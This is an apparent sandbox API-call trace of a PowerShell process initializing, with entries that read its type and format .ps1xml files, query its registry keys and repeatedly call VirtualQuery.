	[0271.596] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.596] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.596] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1b4, lpOverlapped=0x0) returned 1
	[0271.596] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x0, lpOverlapped=0x0) returned 1
	[0271.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0271.597] SetErrorMode (uMode=0x1) returned 0x1
	[0271.597] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d2a0 | out: lpFileInformation=0x12d2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0271.597] SetErrorMode (uMode=0x1) returned 0x1
	[0271.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0271.597] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d388 | out: phkResult=0x12d388*=0x300) returned 0x0
	[0272.119] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d30c, lpData=0x0, lpcbData=0x12d308*=0x0 | out: lpType=0x12d30c*=0x1, lpData=0x0, lpcbData=0x12d308*=0x56) returned 0x0
	[0272.119] CoTaskMemAlloc (cb=0x5a) returned 0x24a790
	[0272.119] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2dc, lpData=0x24a790, lpcbData=0x12d2d8*=0x56 | out: lpType=0x12d2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2d8*=0x56) returned 0x0
	[0272.119] CoTaskMemFree (pv=0x24a790) 
	[0272.119] RegCloseKey (hKey=0x300) returned 0x0
	[0272.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0272.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0272.795] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.424] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.429] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.430] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.430] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.430] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.430] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.432] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.445] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.445] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.446] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.446] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.446] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.446] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.446] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.447] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.003] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.011] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.011] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.011] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.012] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.012] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.012] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.012] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.012] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.013] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.013] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.013] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.013] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.013] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.015] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.017] VirtualQuery (in: lpAddress=0x12c080, lpBuffer=0x12cf40, dwLength=0x30 | out: lpBuffer=0x12cf40*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.017] VirtualQuery (in: lpAddress=0x12c080, lpBuffer=0x12cf40, dwLength=0x30 | out: lpBuffer=0x12cf40*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.017] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0274.018] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.891] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.892] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.894] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.907] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0275.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.908] CoTaskMemFree (pv=0x24c3e0) 
	[0275.911] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.917] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.918] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.918] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.918] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.919] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.919] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0275.920] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.436] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.436] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d528 | out: phkResult=0x12d528*=0x300) returned 0x0
	[0276.437] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0x12d53c, lpData=0x0, lpcbData=0x12d538*=0x0 | out: lpType=0x12d53c*=0x1, lpData=0x0, lpcbData=0x12d538*=0x74) returned 0x0
	[0276.437] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0x12d4ac, lpData=0x0, lpcbData=0x12d4a8*=0x0 | out: lpType=0x12d4ac*=0x1, lpData=0x0, lpcbData=0x12d4a8*=0x74) returned 0x0
	[0276.437] CoTaskMemAlloc (cb=0x78) returned 0x204eb0
	[0276.437] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0x12d47c, lpData=0x204eb0, lpcbData=0x12d478*=0x74 | out: lpType=0x12d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d478*=0x74) returned 0x0
	[0276.437] CoTaskMemFree (pv=0x204eb0) 
	[0276.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0276.437] SetErrorMode (uMode=0x1) returned 0x1
	[0276.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0276.437] SetErrorMode (uMode=0x1) returned 0x1
	[0276.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.439] SetErrorMode (uMode=0x1) returned 0x1
	[0276.439] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.439] SetErrorMode (uMode=0x1) returned 0x1
	[0276.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.439] SetErrorMode (uMode=0x1) returned 0x1
	[0276.439] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.439] SetErrorMode (uMode=0x1) returned 0x1
	[0276.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.440] SetErrorMode (uMode=0x1) returned 0x1
	[0276.440] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0276.440] SetErrorMode (uMode=0x1) returned 0x1
	[0276.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.440] SetErrorMode (uMode=0x1) returned 0x1
	[0276.440] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0276.440] SetErrorMode (uMode=0x1) returned 0x1
	[0276.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0276.440] SetErrorMode (uMode=0x1) returned 0x1
	[0276.440] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0276.440] SetErrorMode (uMode=0x1) returned 0x1
	[0276.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0276.441] SetErrorMode (uMode=0x1) returned 0x1
